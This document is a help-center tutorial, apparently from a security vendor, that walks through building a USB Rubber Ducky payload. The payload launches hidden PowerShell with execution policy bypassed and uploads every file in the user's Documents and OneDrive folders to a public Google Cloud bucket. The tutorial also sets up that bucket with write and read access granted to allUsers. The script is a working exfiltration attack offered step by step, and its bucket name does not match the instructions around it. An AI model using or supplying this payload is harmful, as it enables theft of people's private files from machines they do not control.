Help Center1 Log in to your Google Cloud console to create a google cloud bucket
- Select Cloud Storage
- Buckets
2 Once in the Buckets section:
- Select Create
- Name your Bucket [Name Must be unique]
- accept the default settings
- Select Create
Make sure to uncheck Enforce public access prevention on this bucket as this bucket need to be public facing for the ingress of data to work
Once the bucket has been created you will be presented a screen similar to this one
For this example, we are going to allow for everyone to write (upload files) to the bucket
Select the Permissions tab.
- Select Grant Access
- As New principals type in allUsers
- Assign the role Storage Object Viewer
- Assign the role Storage Object Creator
- Select Save
- Select Allow Public Access
Open a browser and visit Hak5 PayloadStudio
- Select Community Edition
Copy and paste the following code into the Encoder:
REM Data exfiltration to google bucket ThreatLocker GUI r DELAY 2000 STRING cmd ENTER DELAY 2000 STRING powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command "& { Function UploadFile {Param ([string]$path) Process {$Uri = 'https://www.googleapis.com/upload/storage/v1/b/uploaddemo/o?uploadType=media&name='+$path;Invoke-RestMethod -Method Post -Uri $Uri -Header $header -ContentType 'text/plain' -InFile $path;}}; Get-ChildItem -Path $HOME\Documents,$HOME\OneDrive*\Documents -Recurse | Where-Object { $_.Attributes -ne 'Directory' } | ForEach-Object { try { UploadFile -path $_.FullName }catch{} }; }"" DELAY 2000
ENTER
DELAY 2000
STRING exit
ENTER
Search for the string YOUR_BUCKET_NAME in the ducky script and replace it with your Google Buckets Unique name.
Once the change has been made
- Select Generate Payload
- Select Download
Once Downloaded put your ducky into storage mode by clicking The Button
- Drag and drop your new inject.bin into the ducky's root directory
Congratulations, You are done!
- Eject the Ducky and plug it back into your computer
- The Script will run and upload data over to your public Google Bucket